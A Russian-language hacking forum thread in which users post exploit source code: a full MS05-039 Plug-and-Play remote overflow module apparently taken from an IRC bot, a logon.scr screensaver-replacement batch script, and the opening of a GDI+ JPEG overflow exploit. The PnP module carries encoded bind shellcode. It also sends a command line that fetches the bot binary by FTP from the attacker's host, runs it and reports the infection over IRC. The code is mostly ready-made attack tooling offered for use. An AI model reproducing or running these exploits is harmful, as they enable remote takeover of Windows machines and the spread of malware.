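        /* sendIGMP(src, dst): argv[2] is the spoofed source, argv[1] the target */
        return sendIGMP(argv[2], argv[1]) ? 0 : 1;
}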

// milw0rm.com [2006-03-21]

Откомпилированная версия в аттаче.
Хотя можно ещё тут попробовать.

З.Ы. использовать только в ознакомительных целях! И я не несу никакой ответственности за то что в этих архивах.
 

Plug-and-Play Remote Overflow Private version (C++)
Код:
#include "includes.h" 
#include "functions.h" 
#include "extern.h" 

#ifndef NO_PNP 
/*
 * Canned SMB / DCERPC packets for the MS05-039 PnP exploit.  Each starts with
 * a 4-byte NBSS length prefix, then "\xFF SMB" and the command byte; they are
 * sent verbatim with sizeof()-1, so the NBSS length must be patched together
 * with any change to a packet.
 */

/* SMB_COM_NEGOTIATE (0x72): dialect list ending in "NT LM 0.12". */
char SMB_Negotiate[] =
   "\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
   "\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
   "\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
   "\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
   "\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
   "\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
   "\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
   "\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";

/* SMB_COM_SESSION_SETUP_ANDX (0x73) carrying an NTLMSSP NEGOTIATE (type 1);
   native OS / LAN manager strings claim "Windows 2000 2195" / "Windows 2000 5.0". */
char SMB_SessionSetupAndX[] =
   "\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
   "\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
   "\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
   "\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
   "\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
   "\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
   "\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
   "\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
   "\x2E\x00\x30\x00\x00\x00\x00\x00";

/* Second SESSION_SETUP_ANDX with an NTLMSSP AUTHENTICATE (type 3): user name
   "HOD" (UTF-16, houseofdabus), empty NTLM response -- an anonymous-style
   logon; the exploit needs no credentials. */
char SMB_SessionSetupAndX2[] =
   "\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
   "\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
   "\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
   "\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
   "\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
   "\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
   "\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
   "\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
   "\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
   "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
   "\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
   "\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
   "\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";

/* SMB_COM_TREE_CONNECT_ANDX (0x75) header only; pnp_multi() appends the
   UTF-16 "\\<ip>\IPC$" path and the trailer below, then patches the byte
   count (3 bytes from the end of this part) and the NBSS length. */
char SMB_TreeConnectAndX[] =
   "\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
   "\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";

/* Tree-connect trailer: UTF-16 terminator, service "?????", NUL. */
char SMB_TreeConnectAndX_[] =
   "\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";

/* SMB_COM_NT_CREATE_ANDX (0xA2) opening the named pipe "\browser" (UTF-16). */
char SMB_PipeRequest_browser[] =
   "\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
   "\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"
   "\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
   "\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"
   "\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";

/* SMB_COM_TRANSACTION (0x25) over "\PIPE\" carrying a DCERPC bind (PDU type
   0x0B) to 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0 -- the PNP interface --
   with NDR transfer syntax 8a885d04-1ceb-11c9-9fe8-08002b104860 v2. */
char SMB_PNPEndpoint[] =
   "\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
   "\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
   "\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
   "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"
   "\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"
   "\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"
   "\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"
   "\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";

/* SMB_COM_TRANSACTION with a DCERPC request (PDU type 0x00), opnum 0x36, for
   the UTF-16 device id "ROOT\SYSTEM\0000".  The NBSS length 0x0890 (2192)
   says the whole request is 2196 bytes (what pnp_multi sends).  After the
   arguments: NOP sled and repeated "jmp +8" / 0x767a1567 pairs (each jump
   hops over the 4-byte address to the next jump).  Exactly 260 bytes -- the
   same size as RPC_call[MAX_PATH] in pnp_multi(). */
char RPC_call_part1[] =
   "\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
   "\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"
   "\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
   "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"
   "\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"
   "\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"
   "\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"
   "\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"
   "\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
   "\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"
   "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
   "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
   "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
   "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
   "\xEB\x08\x90\x90";

/* Continuation (40 bytes): one more jmp/address pair, NOPs, a "jmp +8" over
   the bytes 48 4F 44 88 ("HOD" tag), more NOPs.  Note pnp_multi() copies
   this to RPC_call+0, not after part1 -- see the note there. */
char RPC_call_part2[] =
   "\xEB\x08\x90\x90\x67\x15\x7a\x76"
   "\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

/* 12-byte tail of the request; placed so that it ends at byte 2196. */
char RPC_call_end[] =
   "\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";

/* Return-address candidates, one per target build (little-endian dwords),
   selected by pnp_multi()'s Offset argument 0/1/2. */
char offset_universal_SP4[] =  "\x79\x3C\x01\x01"; //Windows 2000 SP4 Universall
char offset_SP0_SP4_eng[] = "\xf6\x38\x7a\x76"; //Windows 2000 SP0-SP4 English
char offset_winXP_SP1[] = "\x2a\x57\x8c\x75"; //Windows XP SP1

/* Bind shell, XOR-encoded.  The first 24 bytes are the decoder stub:
     sub ecx,ecx; sub ecx,-0x50 (80 dwords); fldz; fnstenv [esp-0xc]; pop ebx;
     xor dword [ebx+0x13], 0x3704f519; sub ebx,-4; loop
   i.e. everything from offset 24 on is XORed with the key bytes 19 f5 04 37
   repeating every 4 bytes.  The listening port lives at byte offset 186
   (see SET_PORTBIND_PORT); that offset is covered by key bytes 04 37, which
   is why the caller masks the port with 0x0437 before patching it in. */
char bind_shellcode[] =
   "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
   "\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
   "\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
   "\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
   "\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
   "\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
   "\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
   "\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
   "\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
   "\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
   "\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
   "\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
   "\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
   "\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
   "\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
   "\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
   "\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
   "\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
   "\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
   "\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
   "\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
   "\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";

/* Store a 16-bit value (the caller passes it already htons'd and masked)
   into the payload at byte offset 186.  Unaligned store; fine on x86. */
#define SET_PORTBIND_PORT(buf, port) \
*(unsigned short *)(((buf)+186)) = (port)

/*
 * Widen the ASCII string `name` into UTF-16LE in `out`: every byte is
 * followed by a zero byte.  No terminator is written and `out` must hold at
 * least 2*strlen(name) bytes; the caller appends its own trailing NULs.
 */
void convert_name(char *out, char *name)
{
   size_t count = strlen(name);
   size_t i;

   /* forward fill: the character, then its zero high byte */
   for (i = 0; i < count; i++) {
      out[2 * i] = name[i];
      out[2 * i + 1] = '\x00';
   }
}

/*
 * One exploitation attempt against exinfo.ip:445 (MS05-039, PnP service via
 * the \browser pipe).  Walks the SMB handshake with canned packets
 * (negotiate, two NTLMSSP session setups, tree connect to \\ip\IPC$, open
 * \browser, DCERPC bind to the PNP interface), then sends a 2196-byte request
 * (opnum 0x36) carrying the overflow, the return address selected by Offset
 * (0..2 -> the offset_* tables above) and the bind shell, and finally hands
 * the port to ConnectShell().
 *
 * Returns FALSE on any socket or SMB error -- recvbuf[9] is the low byte of
 * the NT status in the SMB header, 4-byte NBSS prefix included -- otherwise
 * whatever ConnectShell() returns.
 *
 * Review notes (behaviour left exactly as found):
 *  - sockfd is never closed, on any path including success; every attempt
 *    leaks a socket.  WSAStartup() is likewise never balanced by WSACleanup().
 *  - The three memcpy() calls that build RPC_call all write at RPC_call+0:
 *    the selected return address and then RPC_call_part2 overwrite the first
 *    bytes of RPC_call_part1 (its NBSS/SMB header) instead of being appended.
 *    As written the packet cannot match the layout part1's own NBSS length
 *    (0x890 = 2196-4) describes, and RPC_call[MAX_PATH] is exactly 260 bytes
 *    -- the size of part1 -- so nothing could be appended anyway.
 *  - bindport is XOR-masked (^ 0x0437) before being patched into the encoded
 *    payload, whose decoder stub unmasks it at run time; but the MASKED value
 *    is what ConnectShell() is then told to connect to.  That looks like a
 *    different port from the one the payload would listen on -- verify before
 *    trusting this "private version".
 *  - smblen is written one byte at a time (low byte, little-endian host);
 *    fine while the value stays below 256, which it does here.
 *  - fsocket/fconnect/fsend/frecv/fhtons/finet_addr and EXINFO come from the
 *    bot's own headers (presumably dynamically resolved Winsock).
 */
bool pnp_multi(int Offset, EXINFO exinfo)
{
   struct sockaddr_in addr;
   int len;
   int sockfd;
   unsigned short smblen;
   unsigned short bindport;
   char tmp[1024];
   char RPC_call[MAX_PATH];      /* 260 bytes: exactly sizeof(RPC_call_part1)-1 */
   char packet[4096];
   char *ptr;
   char recvbuf[4096];

   WSADATA wsa;
   WSAStartup(MAKEWORD(2,0), &wsa);     /* never paired with WSACleanup() */

   if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;

   addr.sin_family = AF_INET;
   addr.sin_port = fhtons(445);
   addr.sin_addr.s_addr = finet_addr(exinfo.ip);
   memset(&(addr.sin_zero), '\0', 8);

   /* from here on every early return leaks sockfd */
   if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;

   /* 1. negotiate; recvbuf[9] == 0 means NT status success */
   if (fsend(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;

   len = frecv(sockfd, recvbuf, 4096, 0);
   if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

   /* 2. NTLMSSP negotiate; only the length is checked here, presumably
         because the expected reply carries a non-zero (more processing
         required) status */
   if (fsend(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;

   len = frecv(sockfd, recvbuf, 4096, 0);
   if (len <= 10) return FALSE;

   /* 3. NTLMSSP authenticate (anonymous "HOD") */
   if (fsend(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;

   len = frecv(sockfd, recvbuf, 4096, 0);
   if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

   /* 4. tree connect to \\ip\IPC$: header, UTF-16 path, trailer; then the
         byte-count and NBSS-length fields are patched (low byte only) */
   ptr = packet;
   memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
   ptr += sizeof(SMB_TreeConnectAndX)-1;

   sprintf(tmp, "\\\\%s\\IPC$", exinfo.ip);
   convert_name(ptr, tmp);
   smblen = strlen((const char*)tmp)*2;
   ptr += smblen;
   smblen += 9;
   memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

   memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
   ptr += sizeof(SMB_TreeConnectAndX_)-1;

   smblen = ptr-packet;
   smblen -= 4;
   memcpy(packet+3, &smblen, 1);

   if (fsend(sockfd, packet, ptr-packet, 0) < 0) return FALSE;

   len = frecv(sockfd, recvbuf, 4096, 0);
   if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

   /* 5. open the \browser pipe */
   if (fsend(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;

   len = frecv(sockfd, recvbuf, 4096, 0);
   if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

   /* 6. DCERPC bind to the PNP interface */
   if (fsend(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;

   len = frecv(sockfd, recvbuf, 4096, 0);
   if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

   /* 7. the overflow request: NOP-filled buffer, 2196 bytes of it sent */
   ptr = packet;
   memset(packet, '\x90', sizeof(packet));

   memcpy(RPC_call, RPC_call_part1, sizeof(RPC_call_part1)-1);

   /* NOTE(review): all three copies below land at RPC_call+0, on top of
      part1's NBSS/SMB header, not after it -- see the header comment */
   if(Offset==0)
      memcpy(RPC_call, offset_universal_SP4, sizeof(offset_universal_SP4)-1);

   if(Offset==1)
      memcpy(RPC_call, offset_SP0_SP4_eng, sizeof(offset_SP0_SP4_eng)-1);

   if(Offset==2)
      memcpy(RPC_call, offset_winXP_SP1, sizeof(offset_winXP_SP1)-1);

   memcpy(RPC_call, RPC_call_part2, sizeof(RPC_call_part2)-1);

   /* sizeof(RPC_call)-1 == 259: the last byte of the 260-byte buffer is dropped */
   memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
   ptr += sizeof(RPC_call)-1;

   /* mask the port with the decoder's key bytes for offset 186 (04 37), then
      patch it in; bindport keeps the MASKED value from here on */
   bindport = (unsigned short)18989;
   bindport ^= 0x0437;
   SET_PORTBIND_PORT(bind_shellcode, fhtons(bindport));
   memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

   /* 12-byte tail placed so that it ends exactly at byte 2196 */
   memcpy(packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1);

   if (fsend(sockfd, packet, 2196, 0) < 0) return FALSE;

   frecv(sockfd, recvbuf, 4096, 0);
   Sleep(300);

   /* passes the masked port (see note above); sockfd is still open */
   return (ConnectShell(exinfo, bindport));
}

/*
 * Connect to the bind shell expected on exinfo.ip:port and make it fetch
 * and run the bot binary: one cmd.exe line that writes an ftp command file
 * ("open <our ip> FTP_PORT", "user 1 1", "get <filename>", "quit"), runs
 * `ftp -n -s:` on it, deletes it and starts the download.  Reports the
 * attempt on IRC (unless exinfo.silent) and to the log.
 *
 * Review notes:
 *  - cmd_buff is 400 bytes and is filled by an unchecked sprintf() that
 *    embeds `filename` three times plus an IP string; a long filename
 *    overflows this stack buffer.  sendbuf (MAX_PATH) gets exinfo.ip, bounded
 *    only by whatever fills EXINFO.
 *  - The socket is leaked when connect() or send() fail, and nothing is read
 *    back: "true" here only means the command line was written to the socket,
 *    not that anything ran.
 *  - GetIP, FTP_PORT, filename, irc_privmsg and addlog are bot globals
 *    defined outside this file.
 */
bool ConnectShell(EXINFO exinfo, int port) {
   SOCKET sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
   if(sock == INVALID_SOCKET) return false;

   SOCKADDR_IN sin;
   memset(&sin, 0, sizeof(sin));
   sin.sin_family = AF_INET;
   sin.sin_addr.s_addr = finet_addr(exinfo.ip);
   sin.sin_port = fhtons((unsigned short)port);

   if(fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false;   /* sock leaked */

   char cmd_buff[400];
   char sendbuf[MAX_PATH];

   /* unbounded: %s x5 into 400 bytes */
   sprintf(cmd_buff, "echo open %s %d > o&echo user 1 1 >> o&echo get %s >> o&echo quit >> o&ftp -n -s:o&del /F /Q o&start %s&%s\r\n", GetIP(exinfo.sock),FTP_PORT, filename, filename, filename);

   if(fsend(sock,(char*)cmd_buff, strlen(cmd_buff),0) == SOCKET_ERROR) return false;   /* sock leaked */

   fclosesocket(sock);

   sprintf(sendbuf, "[PNP]: Exploiting IP: %s.", exinfo.ip);
   if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
   addlog(sendbuf);

   return true;
}

// Entry point of the PnP exploit module: runs pnp_multi() with each of the
// three target-offset selections it understands (0 -> offset_universal_SP4,
// 1 -> offset_SP0_SP4_eng, 2 -> offset_winXP_SP1, named after the tables
// pnp_multi() copies in) and stops at the first one that reports success.
// The result is squashed to exactly TRUE or FALSE for the caller.
bool PNP(EXINFO exinfo) 
{ 
   bool bOK=FALSE; 

   bOK = pnp_multi(0, exinfo); 
   // Each retry only runs if the previous selection failed.
   if(bOK==FALSE) bOK = pnp_multi(1, exinfo); 
   if(bOK==FALSE) bOK = pnp_multi(2, exinfo); 

   if(bOK==TRUE) 
      return TRUE; 
   else 
      return FALSE; 
} 
#endif
 
Подмена скринсейвера в Microsoft Windows
Уязвимые системы:
Windows XP
Windows 2003 Server
(кстати что-то подобное было и в 2000 винде СП2 если не ошибаюсь)
Описание:
так как по умолчанию в Windows XP и 2003 скринсейвер запущен с привилегиями System, то, если злонамеренному пользователю (aka Хацкер) удастся подменить logon.scr на левый файл, нападающий (aka Хацкер) может получить доступ к целевой системе, выполнить произвольный код или запустить вредоносное ПО.
Эксплоит:
Код:
@echo off
rem ---------------------------------------------------------------------------
rem FileName:  DSSExploit.bat
rem Description:	This script replaces the default windows screensaver
rem  	with command prompt and configures the registry for
rem  	attack
rem Author:  Susam Pal
rem Date:  	19th May, 2006
rem ---------------------------------------------------------------------------
rem Reviewer notes: every step below writes into %SystemRoot%\System32 or
rem into HKEY_USERS\.DEFAULT, so the script can only succeed from an account
rem that already holds administrative rights (as the reply further down the
rem thread also observes). Artifacts left on a machine where it ran:
rem System32\logon.scr that is a byte copy of %ComSpec%, a leftover
rem logon.scr.bak, and the .DEFAULT\Control Panel\Desktop values set below
rem (ScreenSaverIsSecure=0, ScreenSaveTimeOut=60, SCRNSAVE.EXE=logon.scr).

rem kill logon.scr if its running
rem find sets errorlevel 1 when no line matched, i.e. logon.scr is not running
tasklist | find /i "logon.scr"
if %errorlevel% == 1 goto replace
taskkill /f /im "logon.scr"

:replace
rem replace
rem The original binary is kept next to the replacement under a .bak name.
rename %SystemRoot%\System32\logon.scr logon.scr.bak
copy %ComSpec% %SystemRoot%\System32\logon.scr

rem update the registry keys for default screen saver
rem .DEFAULT is the profile used at the logon screen, hence the System context.
set DSSKEY="HKEY_USERS\.DEFAULT\Control Panel\Desktop"
reg add %DSSKEY% /v ScreenSaveActive /t REG_SZ /f /d 1
reg add %DSSKEY% /v ScreenSaverIsSecure /t REG_SZ /f /d 0
reg add %DSSKEY% /v ScreenSaveTimeOut /t REG_SZ /f /d 60
reg add %DSSKEY% /v SCRNSAVE.EXE /t REG_SZ /f /d logon.scr
Решение:
вообще, конечно, косяк это... второй раз на одни и те же грабли Микрософт наступает, почти то же самое было и с 2000 виндой...
ну вот... решать эту проблему будем сами...
Первый способ:
Вообще вырубить этот скринсейвер(нафига он нужен вообще)!
второй способ(Старый как мир):
Не запускать подозрительные файлы (free_porno.exe, web-money_hacker, etc.), присланные чёрт знает от кого...
третий способ(самый надёжный):
Выключить компьютер и не включать пока микрософт не выпустит патч.
воть вроде всё...
ах да забыл.... всё что здесь написано исключительно для ознакомления!
 
Ŧ1LAN
так как по умолчанию, в Windows XP и 2003 скринсейвер запущен с привилегями System, то злонамеренному пользователю(aka Хацкер) удасться подменить logon.scr на левый файл, нападающий(aka Хацкер) может получить доступ к целевой системе, выполнить произвольный код или запустить вредоносное ПО.

Посмотрев батник, я понял, что это проканает только с правами админа, а если они есть, то зачем это всё нужно?
 
так как по умолчанию, в Windows XP и 2003 скринсейвер запущен с привилегями System, то злонамеренному пользователю(aka Хацкер) удасться подменить logon.scr на левый файл, нападающий(aka Хацкер) может получить доступ к целевой системе, выполнить произвольный код или запустить вредоносное ПО.
слышал что на xp sp2 уже не пашет (
 
Привожу код эксплоита + реализацию шеллкода под русские версии XP. Третий шеллкод (тот, что про админов) я изменил.
Код:
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
// This is provided as proof-of-concept code only for educational
// purposes and testing by authorized individuals with permission to
// do so.
//
//                 .:[Sacred Desciples of Doom]:.
//
//  GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru> 
//                 Greets to FoToZ who found the bug
//               Exploit will build a malicious JPG File
//
// Note: The headers here are only sample headers taken from a .JPG file,
//       with the FF FE 00 01 inserted in header1. There is a 2500-byte
//       space available for shellcode.
//
//Greets to my friends: Wyk,SSarpele,sAD_sMile, Pimpa, Sacred, to my doggy Kiki :)
//and to other Hackers from Republica Moldova.
//
// Tested on an unpatched WinXP SP1 Eng
//
// PS: I was playing with this exploit for a couple of days ... when I wanted to post
// it, HighT1mes had already made an exploit with the same functionality ...
// but with really not nice shellcodes, especially the shellcode for adding an
// administrator ... but http_shellcode was nice :)
// you stay on #romhack , I stay on #moldhack heheh :) nick:Alladin`
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#include <direct.h>
#include <windows.h>
#include <winbase.h>
#include <winnls.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

// Patch the listen port / connect-back address and port into a shellcode
// blob by storing straight into it at fixed byte offsets (235+16, 221+16,
// 228+16). The offsets are hard-wired to the byte layout of shellcode2
// (SET_PORTBIND_PORT) and shellcode4 (SET_CONNECTBACK_*) as used in main();
// applying them to any other buffer silently corrupts it. Each is a
// type-punned, potentially misaligned store through a char* cast to
// short*/long* -- accepted by x86 MSVC, undefined behaviour in portable C.
#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+235+16)) = (port)
#define SET_CONNECTBACK_IP(buf, ip)     *(unsigned long *)(((buf)+221+16)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+228+16)) = (port)



//++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//pop up cmd.exe
// 15-byte payload: pushes the literal "cmd " and calls through the absolute
// address 0x77C28044, which the inline comment identifies as system() on
// WinXP SP1. Because that address is baked in, the payload is tied to one
// exact DLL build and does nothing meaningful on any other.
char shellcode1[]=
"\x68"// push
"cmd "
"\x8B\xC4"// mov eax,esp
"\x50"// push eax
"\xB8\x44\x80\xC2\x77"// mov eax,77c28044h (address of system() on WinXP SP1)
"\xFF\xD0";// call eax


//bind cmd.exe on a [port] defined by user
unsigned char shellcode2[] =
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
